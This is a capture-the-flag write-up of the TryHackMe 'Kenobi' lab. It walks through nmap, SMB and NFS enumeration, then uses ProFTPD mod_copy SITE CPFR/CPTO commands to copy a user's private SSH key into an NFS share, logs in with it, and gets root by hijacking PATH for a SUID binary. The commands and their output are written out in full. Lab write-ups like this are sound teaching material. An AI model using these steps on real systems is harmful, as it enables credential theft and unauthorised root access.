Kenobi - Write-up - TryHackMe

Information

Room#

  • Name: Kenobi
  • Profile: tryhackme.com
  • Difficulty: Easy
  • Description: Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.

KenobiKenobi

Write-up

Overview#

Install tools used in this WU on BlackArch Linux:

pikaur -S nmap smbclient

[Task 1] Deploy the vulnerable machine#

#2

Scan the machine with nmap, how many ports are open?

Answer: 7

# Nmap 7.80 scan initiated Sat Nov  7 16:07:00 2020 as: nmap -sSVC -p- -oA nmap_full -v 10.10.73.22
Nmap scan report for 10.10.73.22
Host is up (0.031s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         ProFTPD 1.3.5
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      45656/udp6  mountd
|   100005  1,2,3      54279/tcp   mountd
|   100005  1,2,3      55173/udp   mountd
|   100005  1,2,3      57375/tcp6  mountd
|   100021  1,3,4      32885/tcp6  nlockmgr
|   100021  1,3,4      35213/tcp   nlockmgr
|   100021  1,3,4      40834/udp   nlockmgr
|   100021  1,3,4      45078/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     2-3 (RPC #100227)
35213/tcp open  nlockmgr    1-4 (RPC #100021)
50303/tcp open  mountd      1-3 (RPC #100005)
50717/tcp open  mountd      1-3 (RPC #100005)
54279/tcp open  mountd      1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 3h27m51s, median: 0s
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KENOBI<00>           Flags: <unique><active>
|   KENOBI<03>           Flags: <unique><active>
|   KENOBI<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2020-11-07T09:07:31-06:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-11-07T15:07:32
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov  7 16:07:34 2020 -- 1 IP address (1 host up) scanned in 33.97 seconds

[Task 2] Enumerating Samba for shares#

#1

Using nmap we can enumerate a machine for SMB shares.

Nmap has the ability to run to automate a wide variety of networking tasks. There is a script to enumerate shares!

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.73.22

SMB has two ports, 445 and 139.

Answer: 3

$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.73.22
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:13 CET
Nmap scan report for 10.10.73.22
Host is up (0.030s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.73.22\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.73.22\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.73.22\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 5.29 seconds

#2

On most distributions of Linux smbclient is already installed. Lets inspect one of the shares.

smbclient ///anonymous

Using your machine, connect to the machines network share.

Once you're connected, list the files on the share. What is the file can you see?

Answer: log.txt

$ smbclient //10.10.73.22/anonymous
Enter WORKGROUP\noraj's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 12:49:09 2019
  ..                                  D        0  Wed Sep  4 12:56:07 2019
  log.txt                             N    12237  Wed Sep  4 12:49:09 2019

                9204224 blocks of size 1024. 6877104 blocks available
smb: \>

#3

You can recursively download the SMB share too. Submit the username and password as nothing.

smbget -R smb:///anonymous

Open the file on the share. There is a few interesting things found.

Information generated for Kenobi when generating an SSH key for the user
Information about the ProFTPD server.

What port is FTP running on?

Answer: 21

$ smbget -R smb://10.10.73.22/anonymous
$ cat log.txt| grep -i port

#4

Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just an server that converts remote procedure call (RPC) program number > into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.

In our case, port 111 is access to a network file system. Lets use nmap to enumerate this.

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.73.22

Answer: /var

$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.73.22
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:26 CET
Nmap scan report for 10.10.73.22
Host is up (0.031s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

[Task 3] Gain initial access with ProFtpd#

#1

Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.

What is the version?

Answer: 1.3.5

$ ncat 10.10.73.22 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.73.22

#2

We can use searchsploit to find exploits for a particular software version.

Searchsploit is basically just a command line search tool for exploit-db.com.

How many exploits are there for the ProFTPd running?

Answer: 3

$ searchsploit ProFTPd 1.3.5
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                           | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                 | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                                           | linux/remote/36742.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

#3

You should have found an exploit from ProFtpd's mod_copy module.

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any > unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.

#4

We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands.

We knew that the /var directory was a mount we could see (task 2, question 4). So we've now moved Kenobi's private key to the /var/tmp directory.

$ ncat 10.10.73.22 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.73.22]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

#5

Lets mount the /var/tmp directory to our machine

mkdir /mnt/kenobiNFS mount machine_ip:/var /mnt/kenobiNFS ls -la /mnt/kenobiNFS

We now have a network mount on our deployed machine! We can go to /var/tmp and get the private key then login to Kenobi's account.

What is Kenobi's user flag (/home/kenobi/user.txt)?

Answer: 3

$ sudo mount 10.10.73.22:/var /mnt
$ ls -lhA /mnt
total 48K
drwxr-xr-x  2 root root  4.0K Sep  4  2019 backups
drwxr-xr-x  9 root root  4.0K Sep  4  2019 cache
drwxrwxrwt  2 root root  4.0K Sep  4  2019 crash
drwxr-xr-x 40 root root  4.0K Sep  4  2019 lib
drwxrwsr-x  2 root games 4.0K Apr 12  2016 local
lrwxrwxrwx  1 root root     9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root   108 4.0K Sep  4  2019 log
drwxrwsr-x  2 root mem   4.0K Feb 27  2019 mail
drwxr-xr-x  2 root root  4.0K Feb 27  2019 opt
lrwxrwxrwx  1 root root     4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root  4.0K Jan 30  2019 snap
drwxr-xr-x  5 root root  4.0K Sep  4  2019 spool
drwxrwxrwt  6 root root  4.0K Nov  7 16:32 tmp
drwxr-xr-x  3 root root  4.0K Sep  4  2019 www
$ cp /mnt/tmp/id_rsa .
$ sudo umount /mnt
$ chmod 600 id_rsa
$ ssh -i id_rsa kenobi@10.10.73.22
...
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

[Task 4] Privilege Escalation with Path Variable Manipulation#

#1

SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other > custom files could that have the SUID bit can lead to all sorts of issues.

To search the a system for these type of files run the following: find / -perm -u=s -type f 2>/dev/null

What file looks particularly out of the ordinary?

Answer: /usr/bin/menu

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

#2

Run the binary, how many options appear?

Answer: 3

/usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

#3

Strings is a command on Linux that looks for human readable strings on a binary.

This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).

As this file runs as the root users privileges, we can manipulate our path gain a root shell.

We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary > was run, its using our path variable to find the "curl" binary.. Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell > as root!

Answer: 3

kenobi@kenobi:~$ strings /usr/bin/menu
...
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice
...

kenobi@kenobi:~$ cd /tmp/
kenobi@kenobi:/tmp$ echo /bin/bash > curl
kenobi@kenobi:/tmp$ chmod 777 curl 
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
root@kenobi:/tmp# cat /root/root.txt 
177b3cd8562289f37382721c28381f02